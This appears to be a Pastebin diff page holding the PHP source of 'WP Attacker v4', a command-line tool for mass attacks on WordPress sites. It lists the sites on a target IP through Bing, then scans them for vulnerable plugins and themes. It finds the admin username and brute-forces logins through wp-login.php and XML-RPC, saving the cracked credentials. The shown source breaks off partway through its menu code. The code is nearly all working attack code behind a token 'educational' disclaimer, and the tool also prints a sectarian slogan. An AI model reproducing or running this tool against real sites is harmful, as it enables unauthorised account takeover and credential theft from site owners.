API tools faq
paste
View difference between Paste ID: p29RpSTX and 2kp2G4fG
SHOW: | | - or go back to the newest paste.
1
<?php
2
/*
3
4
5
              ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗
6
             ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
7
             ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
8
             ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝
9
             ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║
10
              ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM
11
12
13
    ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗
14
    ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
15
    ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
16
    ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
17
    ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
18
     ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
19
20
    WP Attacker v4 © Group XP 2014
21
22
    Coder : Hannibal Ksa (@r00t3rz)
23
    Home  : alm3refh.com, sec4ever.com
24
25
26
    What's WP Attacker:
27
    - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]).
28
    - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED*
29
    - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
30
    - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
31
    - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
32
    - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*
33
34
    Why WP Attacker?
35
    - Using Bing API, Which leads to faster & guaranteed responde.
36
    - User can use his own 0day exploits.
37
    - BruteForce with two methods/ways.
38
    - List can be updated by the user.
39
    - Fast, simple and easy.
40
41
    # In a simple word, it is an "Automatic WP Exploiter".
42
43
    Disclaimer:
44
    - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
45
    - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
46
    - USE IT UNDER YOUR OWN RISK!
47
    - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
48
49
    Thanks and enjoy.
50
51
    And stay tuned!
52
    Best regards, Ali (aka Hannibal Ksa).
53
54
*/
55
error_reporting(0);
56
function clear(){
57
    ##########################
58
    ##   CLEAN THE SCREEN   ##
59
    ####################################################
60
    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
61
    ####################################################
62
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
63
        @system('cls'); # Windows
64
    } else { # DIRECTORY_SEPARATOR == '\\'
65
        @system('clear'); # Linux/UNIX/OS X
66
    }
67
}
68
function banner(){
69
    ##########################################################
70
    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
71
    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
72
    ##########################################################
73
    ####################
74
    ##  FIRST BANNER  ##
75
    ####################
76
    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
77
    $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
78
    $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
79
    $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
80
    $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
81
    #####################
82
    ##  SECOND BANNER  ##
83
    #####################
84
    $bannertwo = "\n\t           (                                              ";
85
    $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
86
    $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
87
    $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
88
    $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
89
    $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
90
    $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
91
    $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
92
    $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
93
    ####################
94
    ##  THIRD BANNER  ##
95
    ####################
96
    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
97
    $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
98
    $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
99
    $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
100
    $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
101
    #####################
102
    ##  FOURTH BANNER  ##
103
    #####################
104
    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
105
    $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
106
    $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
107
    $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
108
    $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
109
    $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
110
    $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
111
    ####################
112
    ##  FIFTH BANNER  ##
113
    ####################
114
    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
115
    $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
116
    $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
117
    $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
118
    $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
119
    $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
120
    $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
121
    #########################################
122
    ##   GET A RANDOME BANNER & PRINT IT   ##
123
    ##         METASPLOIT SWAG :-P         ##
124
    #########################################
125
    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
126
    print $banner[array_rand($banner)];
127
}
128
function noblackhat(){
129
    ##################
130
    ##  DISCLAIMER  ##
131
    ##################
132
    print "\n\t ______________________________________________";
133
    print "\n\t|    ____                        __  ______    |";
134
    print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
135
    print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
136
    print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
137
    print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
138
    print "\n\t|                        |_|ALM3REFH.com       |";
139
    print "\n\t|                                              |";
140
    print "\n\t+----------------------------------------------+";
141
    print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
142
    print "\n\t+----------------------------------------------+\n\n";
143
    print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
144
    ###########################
145
    ##  5 SECONDS DISCLAIMER ##
146
    ###########################
147
    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
148
\tresponsibility for any actions performed using this tool.
149
\tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!
150
\tIf these terms are not acceptable to you, then do not use this tool.
151
\n\tPlease Read! Continuing in 5 seconds ";
152
    sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
153
    print "\n\n\n\n";
154
}
155
function bing_it($hk){
156
    ##################
157
    ##   BING API   ##
158
    ###########################################################################
159
    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
160
    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
161
    ###########################################################################
162
    $account_key = 'ACCOUNT_KEY_GOES_HERE';
163
    $query = $hk;
164
    $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
165
    $ch = curl_init();
166
    curl_setopt($ch, CURLOPT_URL, $url);
167
    curl_setopt($ch, CURLOPT_HEADER, false);
168
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
169
    curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
170
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
171
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
172
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
173
    curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
174
    $json = curl_exec($ch);
175
    curl_close($ch);
176
    $data = json_decode($json);
177
    foreach ($data->d->results as $value) {
178
        $file = fopen("sites.txt","a+");
179
        fwrite($file,"{$value->DisplayUrl}\n");
180
        fclose($file);
181
    }
182
}
183
function wp($list){
184
    ########################################
185
    ##   CHECK IF IS BUILT ON WORDPRESS   ##
186
    ########################################
187
    $file = file_get_contents($list);
188
    $get = explode('\n', $file);
189
    foreach($get as $site){
190
        $ch = curl_init();
191
        curl_setopt($ch, CURLOPT_URL, $site);
192
        curl_setopt($ch, CURLOPT_HEADER, 0);
193
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
194
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
195
        $result = curl_exec($ch);
196
        curl_exec($ch);
197
        curl_close($ch);
198
        if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
199
            $filename = 'wp-sites.txt';
200
            $fp = fopen($filename, "a+");
201
            $write = fputs($fp, $site."\n");
202
            fclose($fp);
203
        }
204
    }
205
    $lines = file('wp-sites.txt');
206
    $lines = array_unique($lines);
207
    file_put_contents('wp-sites.txt', implode($lines));
208
}
209
function wp_em($list){
210
    ###############################
211
    ##   MAKE'EM CRYSTAL CLEAR   ##
212
    ###############################
213
    $file = file_get_contents($list);
214
    $get = explode("\n", $file);
215
    foreach($get as $wpsite){
216
        $ch = curl_init();
217
        curl_setopt($ch, CURLOPT_URL, $wpsite);
218
        curl_setopt($ch, CURLOPT_HEADER, 0);
219
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
220
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
221
        $result = curl_exec($ch);
222
        curl_exec($ch);
223
        curl_close($ch);
224
        preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
225
        $wpurl = str_replace("xmlrpc.php","",$url[1]);
226
        $filename = 'wp.txt';
227
        $fp = fopen($filename, "a+");
228
        $write = fputs($fp, $wpurl."\n");
229
        fclose($fp);
230
    }
231
    $lines = file('wp.txt');
232
    $lines = array_unique($lines);
233
    file_put_contents('wp.txt', implode($lines));
234
}
235
function xp_scanner($target, $list, $key = NULL){
236
    ##########################################################
237
    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
238
    ##########################################################
239
    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
240
    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
241
    ##########################################################
242
    ##  NAME IS REQUIRED (*)                                ##
243
    ##  PATH IS REQUIRED (*)                                ##
244
    ##  KEYWORD IS OPTIONAL (?)                             ##
245
    ##########################################################
246
    $file = file_get_contents($list);
247
    $plugins = explode("\n", $file);
248
    #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
249
    if($key == NULL){
250
        foreach($plugins as $plugin){
251
            #####################
252
            ##   GET HEADERS   ##
253
            #####################
254
            $x = explode(":", $plugin);
255
            $target = $target.'/'.$x[1];
256
            $check = @get_headers($target);
257
            if(eregi("200",$check[0])){
258
                ####################
259
                ##  PLUGIN FOUND  ##
260
                ####################
261
                print "\n\t[!] FOUND $x[0] -> $target";
262
                /*
263
                #############
264
                ## SAVE IT ##
265
                #############
266
                $data = $target." -> ".$x[0]."\n";
267
                $filename = 'vuln.txt';
268
                $fp = fopen($filename, "a+");
269
                $write = fputs($fp, $data);
270
                fclose($fp);
271
                */
272
            }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
273
        }
274
    }else{
275
        foreach($plugins as $plugin){
276
            #####################
277
            ##   GET KEYWORD   ##
278
            #####################
279
            $x = explode(":", $plugin);
280
            $ch = curl_init();
281
            curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
282
            curl_setopt($ch, CURLOPT_HEADER, 0);
283
            curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
284
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
285
            $result = curl_exec($ch);
286
            curl_exec($ch);
287
            curl_close($ch);
288
            if(preg_match("#".$x[2]."#", $result)){
289
                ####################
290
                ##  PLUGIN FOUND  ##
291
                ####################
292
                print "\n\t[!] FOUND $x[0] -> $target";
293
                /*
294
                #############
295
                ## SAVE IT ##
296
                #############
297
                $data = $target." -> ".$x[0]."\n";
298
                $filename = 'vuln.txt';
299
                $fp = fopen($filename, "a+");
300
                $write = fputs($fp, $data);
301
                fclose($fp);
302
                */
303
            } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
304
        }
305
    }
306
}
307
function xp_get_plugins($target){
308
    #########################
309
    ##   GET ALL PLUGINS   ##
310
    #########################
311
    $ch = curl_init();
312
    curl_setopt($ch, CURLOPT_URL, $target);
313
    curl_setopt($ch, CURLOPT_HEADER, 0);
314
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
315
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
316
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
317
    $result = curl_exec($ch);
318
    curl_exec($ch);
319
    curl_close($ch);
320
    preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
321
    $plugins = array_unique($plugin[1]);
322
    #if(count($plugins)==0){
323
    #    print "No Plugin was found.";
324
    #}
325
    foreach($plugins as $found){
326
        #print "\n\n$found\n\n";
327
        #################
328
        ##  SEARCH IT  ##
329
        #################
330
        xp_scanner_db($target, $found);
331
    }
332
}
333
function xp_get_themes($target){
334
    #########################
335
    ##   GET ALL PLUGINS   ##
336
    #########################
337
    $ch = curl_init();
338
    curl_setopt($ch, CURLOPT_URL, $target);
339
    curl_setopt($ch, CURLOPT_HEADER, 0);
340
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
341
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
342
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
343
    $result = curl_exec($ch);
344
    curl_exec($ch);
345
    curl_close($ch);
346
    preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
347
    $themes = array_unique($theme[1]);
348
    #if(count($plugins)==0){
349
    #    print "No Plugin was found.";
350
    #}
351
    foreach($themes as $found){
352
        #print "\n\n$found\n\n";
353
        #################
354
        ##  SEARCH IT  ##
355
        #################
356
        xp_scanner_db($target, $found);
357
    }
358
}
359
function xp_scanner_db($target, $plugin){
360
    #######################################################################
361
    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
362
    #######################################################################
363
    ##  THIS VERSION ONLY CHECKS  ##
364
    ## - WORDPRESSEXPLOIT.COM     ##
365
    ## - EXPLOIT-DB.COM           ##
366
    ################################
367
    $wpexploit = array("http://www.wordpressexploit.com/", );
368
    $ch = curl_init();
369
    curl_setopt($ch, CURLOPT_URL, $wpexploit);
370
    curl_setopt($ch, CURLOPT_HEADER, 0);
371
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
372
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
373
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
374
    $result = curl_exec($ch);
375
    curl_exec($ch);
376
    curl_close($ch);
377
    if(preg_match("#$plugin#", $result)){
378
        ##############
379
        ##  GOTCHA  ##
380
        ##############
381
        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
382
        ###############
383
        ##  SAVE IT  ##
384
        ###############
385
        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
386
        $filename = 'vulpl.txt';
387
        $fp = fopen($filename, "a+");
388
        $write = fputs($fp, $data."\n");
389
        fclose($fp);
390
    }
391
}
392
function xp_get_user($target,$list, $xmlrpc = NULL){
393
    ####################################
394
    ##     GET WORDPRESS USERNAME     ##
395
    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
396
    ####################################
397
    $user = trim(($target))."/?author=1";
398
    $ch = curl_init();
399
    curl_setopt($ch, CURLOPT_URL, $user);
400
    curl_setopt($ch, CURLOPT_HEADER, 0);
401
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
402
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
403
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
404
    $result = curl_exec($ch);
405
    curl_exec($ch);
406
    curl_close($ch);
407
    preg_match('#<title>(.*?)</title>#', $result, $username);
408
    $account = explode('|', $username[1]);
409
    if($xmlrpc == NULL){
410
        ###########################################################
411
        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
412
        ###########################################################
413
        return xp_brute($target,$account[0],$list);
414
    }else {
415
        ###########################################################
416
        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
417
        ###########################################################
418
        return xp_brute_xmlrpc($target,$account[0],$list);
419
    }
420
}
421
function xp_brute($target,$user,$list){
422
    ###########################################
423
    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
424
    ###########################################
425
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
426
    ##  EXAMPLE:  12345\np4ssw0rd            ##
427
    ##  ( \n = NEW LINE )                    ##
428
    ###########################################
429
    $file = file_get_contents($list);
430
    $passwords = explode("\n", $file);
431
    $target = trim($target);
432
    $user = trim($user);
433
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
434
    foreach($passwords as $password){
435
        #############################
436
        ##  TESTING EACH PASSWORD  ##
437
        #############################
438
        $redirect = $taregt."/wp-admin/";
439
        $curl = curl_init();
440
        curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
441
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
442
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
443
        curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
444
        curl_setopt($curl,CURLOPT_TIMEOUT,10);
445
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
446
        curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
447
        curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
448
        $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
449
        curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
450
        $result = curl_exec($curl);
451
        curl_close($curl);
452
        ##########################
453
        ##  CHECK IF IT WORKED  ##
454
        ##########################
455
        if(strstr($result, 'tab-panel-overview')){
456
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
457
            ###############
458
            ##  SAVE IT  ##
459
            ###############
460
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
461
            $filename = 'cracked.txt';
462
            $fp = fopen($filename, "a+");
463
            $write = fputs($fp, $data."\n");
464
            fclose($fp);
465
            break;
466
        }#else{ print "\n[+] Trying $user:$password"; }
467
    }
468
}
469
function xp_check_xmlrpc($target){
470
    $target = $target."/xmlrpc.php";
471
    $check = @get_headers($target);
472
    if(eregi("200",$check[0])){
473
        return 1;
474
    }else{
475
        return 0;
476
    }
477
}
478
function xp_brute_xmlrpc($target,$user,$list){
479
    ######################################################
480
    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
481
    ######################################################
482
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
483
    ##  EXAMPLE:  12345\np4ssw0rd                       ##
484
    ##  ( \n = NEW LINE )                               ##
485
    ######################################################
486
    $target = trim($target);
487
    $user = trim($user);
488
    if(xp_check_xmlrpc($target) != 1){
489
        print "\n[!] Couldn't find xmlrpc.php in $target\n";
490
        break;
491
    }else{
492
        $file = file_get_contents($list);
493
        $passwords = explode("\n", $file);
494
        print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
495
        foreach($passwords as $password){
496
            $password = trim($password);
497
            $headers = array('Content-Type: application/x-www-form-urlencoded');
498
            $isadmin = '<name>isAdmin</name>';
499
            #############################
500
            ##  TESTING EACH PASSWORD  ##
501
            #############################
502
            $data = "
503
            <methodCall>
504
                <methodName>wp.getUsersBlogs</methodName>
505
                <params>
506
                <param><value><string>$user</string></value></param>
507
                <param><value><string>$password</string></value></param>
508
            </params></methodCall>
509
            ";
510
            $curl = curl_init();
511
            curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
512
            curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
513
            curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
514
            curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
515
            curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
516
            curl_setopt($curl,CURLOPT_TIMEOUT,10);
517
            curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
518
            curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
519
            curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
520
            curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
521
            $result = curl_exec($curl);
522
            curl_close($curl);
523
            ##########################
524
            ##  CHECK IF IT WORKED  ##
525
            ##########################
526
            if(strstr($result, $isadmin)){
527
                print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
528
                ###############
529
                ##  SAVE IT  ##
530
                ###############
531
                $data = "\n[!] Cracked $target -> [ $user:$password ]";
532
                $filename = 'cracked.txt';
533
                $fp = fopen($filename, "a+");
534
                $write = fputs($fp, $data."\n");
535
                fclose($fp);
536
                break;
537
            }#else{ print "\n[+] Trying $user:$password"; }
538
        }
539
    }
540
}
541
function bye(){
542
    ########################
543
    ##  DONE/SAY GOODBYE  ##
544
    ########################
545
    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
546
    ######################
547
    ## DELETE LOG FILES ##
548
    ###################################################################
549
    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
550
    ###################################################################
551
    unlink('sites.txt');
552
    unlink('wp-sites.txt');
553
    unlink('wp.txt');
554
    unlink('vuln.txt');
555
    unlink('cracked.txt');
556
    exit(2);
557
}
558
############################
559
##  COMMAND LINE'S  SHIT  ##
560
############################
561
clear();
562
noblackhat();
563
################################################
564
##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
565
################################################
566
if( strtolower(php_sapi_name()) != 'cli' ) {
567
    printf("%s\n", "Please run only from command line interface.");
568
    exit;
569
}
570
clear();
571
banner();
572
print "\nIP-Address # ";
573
$target = trim(fgets(STDIN));
574
// if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
575
##############################
576
##   DELETE OLD LOG FILES   ##
577
##############################
578
unlink('sites.txt');
579
unlink('wp-sites.txt');
580
unlink('wp.txt');
581
unlink('vuln.txt');
582
unlink('cracked.txt');
583
unlink('vulpl.txt');
584
#############################
585
##   CREAT THE LOG FILES   ##
586
#############################
587
$log1 = fopen("sites.txt","w");fclose($log1);
588
$log2 = fopen("wp-sites.txt","w");fclose($log2);
589
$log3 = fopen("wp.txt","w");fclose($log3);
590
$log4 = fopen("vuln.txt","w");fclose($log4);
591
$log4 = fopen("cracked.txt","w");fclose($log4);
592
$log5 = fopen("vulpl.txt","w");fclose($log5);
593
###############################
594
##  SHIT IS GETTIN' REAL =P  ##
595
###############################
596
print "\nDORK [or simply leave it empty] # ";
597
$dork = trim(fgets(STDIN));
598
print "\n[+] Getting the server's sites";
599
if($dork == ""){
600
    #########################
601
    ##  IF DORK WAS EMPTY  ##
602
    #########################
603
    bing_it("ip:$target");
604
    bing_it("ip:".$target." /page_id=");
605
    bing_it("ip:".$target." Wordpress");
606
    bing_it("ip:".$target." blog");
607
}else{
608
    ###########################
609
    ##  USE THE USER'S DORK  ##
610
    ###########################
611
    bing_it("ip:".$target." ".$dork);
612
}
613
#print "\n[-] Got'em";sleep(1);
614
print "\n[+] Separating the sites";
615
wp('sites.txt');
616
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
617
wp_em('wp-sites.txt');
618
#################
619
##   Results   ##
620
#################
621
print "\n[+] Finished, these are the website/s that I found:\n";
622
$wplist = file_get_contents('wp.txt');
623
$get = explode("\n", $wplist);
624
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
625
foreach($get as $hk){
626
    if(!$hk==""){
627
        print "\n\t[!] $hk";
628
    }
629
}
630
###########################
631
##   GIVE ME AN OPTION   ##
632
###########################
633
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
634
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
635
$what = trim(fgets(STDIN));
636
$choice = array("1","2","3","4");
637
$yesno = array("y","yes");
638
if(in_array($what, $choice)){
639
    if($what == "1"){
640
        print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
641
        $list = trim(fgets(STDIN));
642
        if(!is_file($list)) {
643
            #######################
644
            ##  CAN'T LOAD LIST  ##
645
            #######################
646
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
647
            ##############
648
            ##   EXIT   ##
649
            ##############
650
            bye();
651
        }
652
        #################
653
        ##   POOYAA!   ##
654
        #################
655
        print "\n[+] Scanning begun";
656
        $file = file_get_contents($list);
657
        $plugins = explode("\n", $file);
658
        print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
659
        $targets = file_get_contents('wp.txt');
660
        $r00t3rz = explode("\n", $targets);
661
        print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
662
        $key = strtolower(trim(fgets(STDIN)));
663
        if(in_array($key, $yesno)){
664
            $key = "set";
665
        }else{
666
            $key = NULL;
667
        }
668
        foreach($r00t3rz as $z){
669
            if(!$z == ""){
670
                xp_scanner($z, $list, $key);
671
            }
672
        }
673
        /*
674
        #################
675
        ##   Results   ##
676
        #################
677
        print "\n[+] Scanning finished!";
678
        $vul = file_get_contents('vuln.txt');
679
        $able = explode("\n", $vul);
680
        print '[ '.count($able).' Website ]\n';
681
        foreach($able as $gxp){
682
            if(!$gxp==""){
683
                print "\n\t[!] $gxp";
684
            }
685
        }
686
        */
687
        bye();
688
    } elseif($what == "2") {
689
        print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
690
        #################
691
        ##   POOYAA!   ##
692
        #################
693
        print "\n[+] Scanning begun";
694
        $targets = file_get_contents('wp.txt');
695
